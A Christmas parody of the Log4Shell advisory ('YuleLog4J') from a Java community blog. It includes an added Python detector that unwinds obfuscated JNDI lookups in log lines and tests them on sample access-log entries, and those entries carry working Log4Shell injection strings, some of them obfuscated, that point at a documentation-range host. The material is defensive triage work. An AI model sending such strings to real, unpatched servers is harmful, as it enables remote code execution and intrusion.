Friends of OpenJDK Today

Santa Claus Issues YuleLog4J Advisory

December 24, 2021

Author(s)

  • Erik Costlow

    Erik Costlow was Oracle’s principal product manager for Java 8 and 9, focused on security and performance. His security expertise involves threat modeling, code analysis, and instrumentation of security sensors. ...

Christmas revelers and elves are urged to patch their fireplaces, as a Remote Combustion Effect (RCE) vulnerability has been discovered in the traditional holiday YuleLog4J. YuleLog4J is one of the most popular holiday celebrations, appearing in approximately 64% of fireplaces and streamed to millions of homes over Netflix and Amazon Prime.

The vulnerability occurs in the Jingle Naming and Directory Interface (JNDI), a utility that enables lookups of holiday cheer from remote sources. Unpatched versions of YuleLog4J can load potentially un-cheerful items such as coal, traditionally reserved as a stocking stuffer. The advisory was managed through coordinated disclosure between the North Pole and the GiftHub Security Research Team.
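For revelers whose fireplaces run the real thing: the Jingle Naming and Directory Interface above is a stand-in for the JNDI lookup in Log4j 2 (Log4Shell, CVE-2021-44228), where a logged string such as `${jndi:ldap://host/x}` made the logger fetch and load a remote object, and attackers hid the word "jndi" behind nested lookups like `${${lower:j}ndi:...}` or `${::-j}`. The triage detector below is an added example written for this post, not code from the article or from the Log4j project: it unwinds those nesting tricks the way the vulnerable substitutor did and flags lines that resolve to a JNDI lookup. It implements only the lookups attackers actually used for hiding (`lower`, `upper` and the `:-` default syntax); the access-log lines and the 198.51.100.0/24 addresses are constructed for the example.

```python
"""Triage detector for Log4Shell-style JNDI lookup strings in log lines.

Added example for this post, not code from the original article or from
the Log4j project. It mimics only the handful of Log4j 2 lookups that
attackers used to hide the word "jndi" (lower, upper, and the ":-"
default-value syntax); everything else is left untouched. The log lines
below are constructed, using documentation-reserved 198.51.100.0/24 addresses.
"""
import re

# Innermost ${...}: a body containing no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are looking for once the obfuscation has been unwound: the
# lookup plus its target URL (scheme://host[:port]/path).
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*://[^}\s"]+)', re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Evaluate one innermost lookup the way the vulnerable substitutor would.

    ${lower:J} -> "j", ${upper:n} -> "N", ${::-j} / ${env:NOPE:-j} -> "j".
    A jndi lookup, or any lookup we do not model, is returned unchanged.
    """
    kind, sep, arg = body.partition(":")
    kind = kind.strip().lower()
    if kind == "jndi":
        return "${" + body + "}"
    if ":-" in body:                       # default-value syntax: keep only the default
        return body.split(":-", 1)[1]
    if sep and kind == "lower":
        return arg.lower()
    if sep and kind == "upper":
        return arg.upper()
    return "${" + body + "}"               # not something we can (or need to) resolve


def normalize(text: str, max_rounds: int = 16) -> str:
    """Unwind nested lookups from the inside out until nothing changes.

    The round cap guards this detector against pathological input; Log4j's
    own uncontrolled recursion on self-referential lookups is the DoS that
    2.17.0 fixed, which the post's "Denial of Santa" alludes to.
    """
    for _ in range(max_rounds):
        unwound = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if unwound == text:
            break
        text = unwound
    return text


def find_jndi_probe(line: str):
    """Return the JNDI target (e.g. 'ldap://host:1389/a') if the line carries a probe, else None."""
    match = _JNDI.search(normalize(line))
    return match.group(1) if match else None


def scan(lines):
    """Scan an iterable of log lines; return one finding per probe-carrying line."""
    findings = []
    for number, line in enumerate(lines, 1):
        target = find_jndi_probe(line)
        if target is not None:
            findings.append({"line": number, "target": target, "normalized": normalize(line)})
    return findings


# Constructed Apache-style access log lines (not real traffic). Lines 1-3 carry
# a probe in the User-Agent field, plain and then obfuscated two ways; line 4 is
# a normal browser; line 5 shows a benign, non-JNDI lookup that must not alarm.
SAMPLE_LOG = [
    '198.51.100.23 - - [24/Dec/2021:00:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [24/Dec/2021:00:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [24/Dec/2021:00:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/a}"',
    '198.51.100.42 - - [24/Dec/2021:00:00:04 +0000] "GET /sleigh HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.42 - - [24/Dec/2021:00:00:05 +0000] "GET /env HTTP/1.1" 200 "-" "build=${env:BUILD_ID:-unknown}"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"line {finding['line']}: JNDI probe -> {finding['target']}")
```

Treat a hit as a sign that someone is probing, not proof that the lookup ran: whether it fired depends on the YuleLog4J version doing the logging, and the only real cure is the patched release, not a smarter grep. The normalizer is also deliberately incomplete (other lookups such as `date` were abused too), so a clean scan is not a clean bill of health.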

Additional vulnerabilities have been detected that may impact holiday celebrations. Previous versions of YuleLog4J are also at risk of a Denial of Santa (DoS) vulnerability in recursive lookups when paired with untrusted kindling.

Mitigating Your Risk

Patches addressing the RCE are available in YuleLog4J 2.17.0.

Additional recommendations for a safe holiday are available in the Code of the Elves:

  1. Treat every day like Christmas.
  2. There’s room for everyone on the nice list.
  3. The best way to spread Christmas cheer is singing loud for all to hear.



Comments (1)


Sharron Reed Gavin

LOVE IT!!!
